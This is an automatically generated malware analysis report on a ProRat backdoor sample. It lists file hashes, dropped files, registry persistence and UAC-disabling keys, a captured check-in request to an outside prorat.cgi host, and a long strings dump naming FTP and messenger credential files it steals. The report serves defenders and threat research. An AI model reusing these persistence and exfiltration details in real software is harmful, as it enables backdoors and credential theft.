AIT.Trojan.Autoit.CLU_8b7e04784b

by malwarelabrobot on February 8th, 2018 in Malware Descriptions.

AIT:Trojan.Autoit.CLU (BitDefender), Backdoor:Win32/Prorat.AC (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), BackDoor.ProRat (DrWeb), AIT:Trojan.Autoit.CLU (B) (Emsisoft), Artemis!8B7E04784B7B (McAfee), Trojan.Gen.2 (Symantec), AIT:Trojan.Autoit.CLU (FSecure), Win32:GenMalicious-AGV [Trj] (AVG), Win32:GenMalicious-AGV [Trj] (Avast), TROJ_GEN.R03BC0WKJ17 (TrendMicro), AIT:Trojan.Autoit.CLU (AdAware), Trojan.Win32.Bumat.FD, VirusParite.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor, Virus


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 8b7e04784b7ba4b6955c3ad1e476510a
SHA1: e38d880f612499dc396f296d63a783baf3f2f6f0
SHA256: 6b562d027c1c51fee98c241f7230b16c5f2dd8daba162a5e1bcf53bda273e7b7
SSDeep: 24576:/4lavt0LkLL9IMixoEgeaK4bBHdsFA5/vN/kIwT7q9MmCS:6kwkn9IMHeaKwaiN/kZaPCS
Size: 1550848 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-11-18 18:28:15
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The AIT creates the following process(es):

fservice.exe:1476
5141.exe:288
%original file name%.exe:3624

The AIT injects its code into the following process(es):

services.exe:1276
Explorer.EXE:2024
conhost.exe:3700

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process fservice.exe:1476 makes changes in the file system.
The AIT creates and/or writes to the following file(s):

C:\Windows\services.exe (2457 bytes)
C:\Windows\system\sservice.exe (2105 bytes)

The AIT deletes the following file(s):

C:\Windows\System32\fservice.exe (0 bytes)
C:\Windows\system\sservice.exe (0 bytes)

The process 5141.exe:288 makes changes in the file system.
The AIT creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5141\5141.exe.bat (135 bytes)
C:\Windows\System32\fservice.exe (2457 bytes)
C:\Windows\system\sservice.exe (2105 bytes)

The process %original file name%.exe:3624 makes changes in the file system.
The AIT creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jbvpkqi (10089 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\autA852.tmp (5393 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5141\5141.exe (703 bytes)

The AIT deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5141\5141.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jbvpkqi (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\autA852.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5141 (0 bytes)

Registry activity

The process 5141.exe:288 makes changes in the system registry.
The AIT creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"DirectX For Microsoft® Windows" = "C:\Windows\system32\fservice.exe"

[HKCU\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings]
"ICQ_UIN" = "xnt/on,hq/bnl"
"LanNotifie" = ""

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}]
"StubPath" = "C:\Windows\system\sservice.exe"

[HKCU\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings]
"Bulas" = "1"
"Kurban_Ismi" = "whbuhl"
"XP_FW_Disable" = "1"
"XP_SYS_Recovery" = "1"
"Hata" = ""
"Port" = "4001"
"Sifre" = "032547"
"Mail" = "cnlcdsl`oAx`inn/bnl"
"ICQ_UIN2" = "046007686"
"FW_KILL" = "1"

"Online_List" = "iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh"
"KSil" = "1"

The AIT adds the reference to itself to be executed when a user logs on:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "Explorer.exe C:\Windows\system32\fservice.exe"

The process %original file name%.exe:3624 makes changes in the system registry.
The AIT creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
"ConsentPromptBehaviorAdmin" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The AIT deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5 File path
6796067f8731bcfe771c3023adc9143d c:\Windows\System32\fservice.exe
904f3b552d0b762edb4520163d12d3cf c:\Windows\System32\reginv.dll
d910659cca6a1650c10ff263c8a10fe7 c:\Windows\System32\winkey.dll
6796067f8731bcfe771c3023adc9143d c:\Windows\services.exe
6796067f8731bcfe771c3023adc9143d c:\Windows\system\sservice.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 573044 573440 4.63126 74af66fa540568c59b3868e78900e476
.rdata 577536 182122 182272 4.0072 576c856afaad699ad9fe099fc6a9ce33
.data 761856 40756 25088 1.38934 e6d2e204147f7cdc3055011093632f54
.rsrc 802816 726352 726528 5.43142 63ee5075589e1a5967fb64e2b42441b5
.reloc 1531904 42082 42496 3.63105 c2f6ddaeef894b7510c3be928eeae5dd

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=WIN_UK_FFOO__I_&ipadresi=192.168.11.133&serverportu=5110&kurban=victim&servermodeli=V1.9-Test-Version-8&serversaati=11:35:39_PM&servertarihi=2/7/2018&serversifre=123456&islem=log 54.221.207.100
mta6.am0.yahoodns.net 67.195.229.59
www.icq.com 178.237.20.20
you.no-ip.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET hXXp://VVV.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=WIN_UK_FFOO__I_&ipadresi=192.168.11.133&serverportu=5110&kurban=victim&servermodeli=V1.9-Test-Version-8&serversaati=11:35:39_PM&servertarihi=2/7/2018&serversifre=123456&islem=log HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: VVV.yoursite.com
Connection: Keep-Alive


HTTP/1.1 302 Found
Date: Wed, 07 Feb 2018 21:35:41 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Location: hXXp://VVV.hostingdomains.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8







The AIT connects to the servers at the folowing location(s):







services.exe_1276:




.rsrc
Portl
LocalPortl
PeerPortl
SocksPortl
SocksPassword`
wsock32.dll
Unable to load wsock32.dll Error #
%s: WSAStartup error #%d
0.0.0.0
Cannot change Port if not closed
Cannot change LocalPort if not closed
255.255.255.255
WSocketResolveHost: Cannot convert host address '%s', Error #%d
WSocketResolvePort: Invalid Port.
WSocketResolvePort: Cannot convert port '%s', Error #%d
WSocketResolveProto: Cannot convert protocol '%s', Error #%d
GetPeerPort
%s: can't start DNS lookup, error #%d
winsock.bind failed, error #%d
winsock.getsockname failed, error #%d
Connect: No Port Specified
listen: port not assigned
Winsock.GetHostName failed
Operation would block
Operation now in progress
Operation already in progress
Socket operation on non-socket
Protocol not supported
Socket type not supported
Operation not supported on socket
Protocol family not supported
Address family not supported by protocol family
WinSock DLL cannot support this application
Can't change socks port if not closed
Listening is not supported thru socks server
tcp is the only protocol supported thru socks server
0.0.0.1
command not supported
address type not supported
TFtpString
TFtpServer (c) 1998-2000 F. Piette V1.08
FtpServerException
FtpServerException\
FtpSrv
TFtpSrvAuthenticateEvent
TFtpCtrlSocket
Password
TFtpSrvChangeDirectoryEvent
TFtpSrvBuildDirectoryEvent
TFtpSrvClientConnectEvent
TFtpSrvDataSessionConnectedEvent
TFtpSrvClientCommandEvent
Keyword
TFtpSrvAnswerToClientEvent
TFtpSrvValidateXferEvent
TFtpSrvDataAvailableEvent
TFtpSrvRetrDataSentEvent
TFtpSrvCommandProc
TFtpSrvCommandTableItem
TFtpServer
220 ICS FTP Server ready.
PORT
500 '%s': command not understood.
331 Password required for %s.
503 Login with USER first.
230 User %s logged in.
530 Login incorrect.
$530 Please login with USER and PASS.
250 CWD command successful. "%s" is current directory.
501 CWD failed. %s
257 "%s" is current directory.
200 Port command successful.
501 Invalid PORT command.
150 Opening data connection for %s.
501 Cannot STOR. %s
ftp-data
426 Connection closed; %s.
426 Connection closed; transfer aborted. Error #%d
501 Cannot RETR. %s
451 Failed: %s.
1 ftp ftp
%s %2.2d
200 Type set to %s.
500 'TYPE %s': command not understood.
250 File '%s' deleted.
450 File '%s' can't be deleted.
550 '%s': no such file or directory.
213 %d
550 Command failed: %s.
350 REST supported. Ready to resume at byte offset %d.
501 Syntax error in parameter: %s.
553 '%s': file already exists.
250 File '%s' renamed to '%s'.
450 File '%s' can't be renamed.
200 Ok. Parameter was '%s'.
550 '%s': can't create directory.
550 '%s': file or directory already exists.
257 '%s': directory created.
150 APPE supported. Ready to append file "%s" at offset %d.
200 Ok. STRU parameter '%s' ignored.
550 '%s': no such directory.
250 '%s': directory removed.
550 '%s': can't remove directory.
227 Entering Passive Mode (127,0,0,1,%d,%d).
227 Entering Passive Mode (%d,%d,%d,%d,%d,%d).
500 PASV exception: '%s'.
213 %s
550 %s
SMTP component (c) 1997-2000 F. Piette V2.17
SmtpException
SmtpExceptionD
SmtpProt
TSmtpState
smtpReady
smtpDnsLookup
smtpConnecting
smtpConnected
smtpInternalReady
smtpWaitingBanner
smtpWaitingResponse
smtpAbort
TSmtpRequest
smtpConnect
smtpHelo
smtpMailFrom
smtpVrfy
smtpRcptTo
smtpData
smtpQuit
smtpRset
smtpOpen
smtpMail
smtpCustom
TSmtpFct
smtpFctNone
smtpFctHelo
smtpFctConnect
smtpFctMailFrom
smtpFctRcptTo
smtpFctData
smtpFctVrfy
smtpFctQuit
smtpFctRset4
TSmtpFctSet
TSmtpContentType
smtpHTML
smtpPlainText
TSmtpDisplay
TSmtpHeaderLineEvent
TSmtpProcessHeaderEvent
TSmtpGetDataEvent
MsgLine
TSmtpRequestDone
TSmtpAttachmentContentType
TSmtpAttachHeader
TSmtpNextProc
TCustomSmtpClient`
TCustomSmtpClient(
TSmtpCli
OnProcessHeader
TSyncSmtpCli
TSyncSmtpCliT
smtp
SMTP component not ready
Uhh%D
SMTP component not connected
SMTP component already connected
426 Operation aborted.
FtpSrvT (c) 1999-2000 F. Piette V1.02
TFtpCtrlSocket (c) 1998-2000 F. Piette V1.06
EFtpCtrlSocketException
FtpSrvC
TFtpCtrlState
ftpcInvalid
ftpcWaitingUserCode
ftpcWaitingPassword
ftpcReady
ftpcWaitingAnswert_D
TFtpCmdType
ftpcPORT
ftpcSTOR
ftpcRETR
ftpcCWD
ftpcXPWD
ftpcPWD
ftpcUSER
ftpcPASS
ftpcLIST
ftpcRMD
ftpcTYPE
ftpcSYST
ftpcQUIT
ftpcDELE
ftpcRNFR
ftpcMKD
ftpcRNTO
ftpcNOOP
ftpcNLST
ftpcABOR
ftpcCDUP
ftpcSIZE
ftpcREST
ftpcAPPE
ftpcSTRU
ftpcMDTMx`D
TFtpOption
ftpcUNC
TFtpOptions
CmdBuf
CmdLen
TFtpCtrlSocketxaD
FtpStatel
PassWord
220-ICS FTP Server ready
ssHorizontal
OnKeyDown
OnKeyPress@
OnKeyUp
windows
AutoHotkeys
:].tJ
EInvalidGraphicOperation
UhY%F
KeyPreviewx8E
WindowState
ssHotTrack
TWindowState
poProportional
TWMKey
Uh.oF
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
TDragOperation
TKeyEvent
TKeyPressEvent
crSQLWait
Uh.EG
%s (%s)
IMM32.DLL
EInvalidOperation
%s[%d]
%s_%d
USER32.DLL
comctl32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
kernel32.dll
Portions Copyright (c) 1983,99 Borland
%u8F3
iphlpapi.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
advapi32.dll
shell32.dll
.text
.rdata
.data
.reloc
.aspack
.adata
MFC42.DLL
MSVCRT.dll
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardState
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
dW%xSJ"
mfc42.dll
msvcrt.dll
.HookSec
B[ProRat v1.9 Trojan Horse - Coded by PRO Group - Made in Turkey]
RegEnumKeyW
Advapi32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
GetCPInfo
TESTDLL.dll
4 4$4(4,4044484
6 6$6(6,6
CRTZFUKL,GZG
LTCPAJ34,GZG
151.164.23.201
151.164.1.8
212.101.97.7
ege.edu.tr
ankara.edu.tr
192.168.0.1
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
cuteftp
Login :
Password :
Pass :
SOFTWARE\Microsoft\Windows\CurrentVersion
%Program Files%
\GlobalSCAPE\CuteFTP\sm.dat
\GlobalSCAPE\CuteFTP\smdata.dat
\CuteFTP\tree.dat
\CuteFTP\smdata.dat
\GlobalSCAPE\CuteFTP Pro\sm.dat
\GlobalSCAPE\CuteFTP\5.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings
\RSACi.rat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default\hXXp://VVV.rsac.org/ratingsv01.html
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy\
PRNumURLExpressions
PRBUPort
PRBUUrl
Sites.dat
Password :
Port :
Port
Tport_atm=0
\reg_ent.reg
regedit.exe /s
\winrar.exe
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\
d_.exe
winoa386.mod
\scrpt.bat
\scrpt.vbs
\winkey.dll
\reginv.dll
127.0.0.1
.jpeg
\win.ini
\system.ini
Explorer.exe
del %c%s%c
if exist %c%s%c goto 1
del À
\system32\fservice.exe
\system\sservice.exe
\mps.atm
\kdd32.atm
\system32\winkey.dll
\system\winkey.dll
\system32\wininv.dll
\system\wininv.dll
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Explorer.exe
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag
GET /friendship/email_thank_you.php?folder_id=17961¶ms_count=0&nick_name=ProRat Server&user_email=
@yahoo.com&user_uin=&friend_nickname=&friend_contact=
&friend_nickname2=&friend_contact2=&x=36&y=10 HTTP/1.1
Referer: hXXp://VVV.icq.com/friendship/pages/send_by_email_17961.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: VVV.icq.com
Software\Microsoft\Windows\CurrentVersion\Policies\System
c:\autoexec.bat
\p_ekran.jpg
services.exe
msn.ini
yahoo.ini
Windows Ver :
Windows Language :
Windows Path :
software\microsoft\windows\currentversion
VVV.icq.com
Port :
Password :
Microsoft Outlook Express 6.00.2800.1158
\p_ekran.bmp
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings
Tport
Pplugin1.dll
Pplugin2.dll
Pplugin3.dll
Pplugin4.exe
Pplugin4.dat
Pplugin4.exe /stext
ktd32.atm
Pplugin8.exe
PpluginCd.dll
Pplugin9.dat
Pplugin8.exe /stext
Pplugin10xa.exe
Pplugin10xa.exe /stext
winp9.exe
winp9.exe /stext
eimsn.exe
winrar.exe
Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
\services.exe
Windows services
Online_List_atm=iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh
Port_atm=4001
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
shutdown.exe -s -t 00
shutdown.exe -r -t 00
shutdown.exe -l
\refresh.scf
CONTROL.EXE desk.cpl
CONTROL.EXE hdwwiz.cpl
CONTROL.EXE inetcpl.cpl
CONTROL.EXE appwiz.cpl
CONTROL.EXE intl.cpl
CONTROL.EXE joy.cpl
CONTROL.EXE access.cpl
CONTROL.EXE main.cpl
CONTROL.EXE ncpa.cpl
CONTROL.EXE nusrmgr.cpl
CONTROL.EXE timedate.cpl
CONTROL.EXE mmsys.cpl
CONTROL.EXE powercfg.cpl
CONTROL.EXE sysdm.cpl
CONTROL.EXE telephon.cpl
CONTROL.EXE odbccp32.cpl
\SOFTWARE\Microsoft\Internet Explorer\TypedURLs
////////// URL HISTORY //////////
url10
url11
url12
url13
url14
url15
url16
url17
url18
url19
url20
url21
url22
url23
url24
url25
00010pPassword Decrypt Error!
SMTP
\ICQ\Icq.exe
\Messenger\msmsgs.exe
\MSN Messenger\msnmsgr.exe
\Yahoo!\Messenger\YPager.exe
\Outlook Express\msimn.exe
\GlobalSCAPE\CuteFTP\cutftp32.exe
\NetMeeting\conf.exe
notepad.exe
mspaint.exe
wordpad.exe
calc.exe
\WinZip\WINZIP32.EXE
\WinRAR\WinRAR.exe
cmd.exe
command.com
\Internet Explorer\IEXPLORE.EXE
wmplayer.exe
\Winamp\winamp.exe
\Real\RealOne Player\realplay.exe
\QuickTime\QuickTimePlayer.exe
\Movie Maker\moviemk.exe
\FlashGet\flashget.exe
_ReadCdKeys
&serverportu=
HTTP/1.1
ProRat@Yahoo.Com
<ProRat@Yahoo.Com>
FtpServer1
FtpServer2
SmtpCli1
FtpServer1Authenticate
FtpServer2Authenticate
FormKeyDown
SmtpCli1RequestDone
FtpServer1ChangeDirectory
Memo2KeyDown
xxtype.cpp
derv->tpClass.tpcFlags & CF_HAS_BASES
Inappropriate I/O control operation
Broken pipe
Operation not permitted
%H:%M:%S
%m/%d/%y
%A, %B %d, %Y
d/d/d d:d:d.d
xx.cpp
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcDtorAddr
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
memType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
elemType->tpClass.tpcFlags & CF_HAS_DTOR
C:\Windows\
Cv=kAv.SCv
Dv}.Bv
Project1.exe
@$xp$16Ftpsrv@FtpSrv__3
@$xp$17Ftpsrv@TFtpServer
@$xp$17Ftpsrv@TFtpString
@$xp$17Smtpprot@TSmtpCli
@$xp$17Smtpprot@TSmtpFct
@$xp$18Ftpsrvc@TFtpOption
@$xp$19Ftpsrvc@TFtpCmdType
@$xp$19Ftpsrvc@TFtpOptions
@$xp$19Smtpprot@TSmtpState
@$xp$20Smtpprot@TSmtpFctSet
@$xp$21Ftpsrvc@TCommandEvent
@$xp$21Ftpsrvc@TDisplayEvent
@$xp$21Ftpsrvc@TFtpCtrlState
@$xp$21Smtpprot@TSmtpDisplay
@$xp$21Smtpprot@TSmtpRequest
@$xp$21Smtpprot@TSyncSmtpCli
@$xp$22Ftpsrvc@TFtpCtrlSocket
@$xp$22Smtpprot@SmtpException
@$xp$22Smtpprot@TSmtpNextProc
@$xp$25Ftpsrv@FtpServerException
@$xp$25Ftpsrv@TFtpSrvCommandProc
@$xp$25Smtpprot@TSmtpContentType
@$xp$25Smtpprot@TSmtpRequestDone
@$xp$26Ftpsrv@TFtpCtrlSocketClass
@$xp$26Smtpprot@TCustomSmtpClient
@$xp$26Smtpprot@TSmtpAttachHeader
@$xp$26Smtpprot@TSmtpGetDataEvent
@$xp$29Smtpprot@TSmtpHeaderLineEvent
@$xp$30Ftpsrv@TFtpSrvCommandTableItem
@$xp$31Ftpsrv@TFtpSrvAuthenticateEvent
@$xp$31Ftpsrv@TFtpSrvRetrDataSentEvent
@$xp$31Ftpsrv@TFtpSrvValidateXferEvent
@$xp$31Ftpsrvc@EFtpCtrlSocketException
@$xp$32Ftpsrv@TFtpSrvClientCommandEvent
@$xp$32Ftpsrv@TFtpSrvClientConnectEvent
@$xp$32Ftpsrv@TFtpSrvDataAvailableEvent
@$xp$32Smtpprot@TSmtpProcessHeaderEvent
@$xp$33Ftpsrv@TFtpSrvAnswerToClientEvent
@$xp$33Ftpsrv@TFtpSrvBuildDirectoryEvent
@$xp$34Ftpsrv@TFtpSrvChangeDirectoryEvent
@$xp$35Smtpprot@TSmtpAttachmentContentType
@$xp$39Ftpsrv@TFtpSrvDataSessionConnectedEvent
@Ftpsrv@CopyRight
@Ftpsrv@Finalization$qqrv
@Ftpsrv@FtpServerException@
@Ftpsrv@Register$qqrv
@Ftpsrv@TFtpServer@
@Ftpsrv@TFtpServer@$bctr$qqrp18Classes@TComponent
@Ftpsrv@TFtpServer@$bdtr$qqrv
@Ftpsrv@TFtpServer@AddCommand$qqrx17System@AnsiStringxynpqqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2$v
@Ftpsrv@TFtpServer@BuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%p15Classes@TStreamo
@Ftpsrv@TFtpServer@ClientCommand$qqrp14System@TObjectpci
@Ftpsrv@TFtpServer@ClientDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientPassiveSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorDataAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@CommandABOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandAPPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCDUP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandChangeDir$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDELE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2o
@Ftpsrv@TFtpServer@CommandLIST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMDTM$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMKD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNLST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNOOP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASS$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASV$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPORT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandQUIT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandREST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRETR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRMD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNFR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNTO$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSIZE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTRU$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSYST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandTYPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandUSER$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandXPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@DisconnectAll$qqrv
@Ftpsrv@TFtpServer@GetActive$qqrv
@Ftpsrv@TFtpServer@GetClientCount$qqrv
@Ftpsrv@TFtpServer@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@SendNextDataChunk$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocket
@Ftpsrv@TFtpServer@ServSocketSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ServSocketStateChange$qqrp14System@TObject20Wsocket@TSocketStatet2
@Ftpsrv@TFtpServer@SetActive$qqro
@Ftpsrv@TFtpServer@Start$qqrv
@Ftpsrv@TFtpServer@StartSendData$qqrp22Ftpsrvc@TFtpCtrlSocket
@Ftpsrv@TFtpServer@Stop$qqrv
@Ftpsrv@TFtpServer@TriggerAlterDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
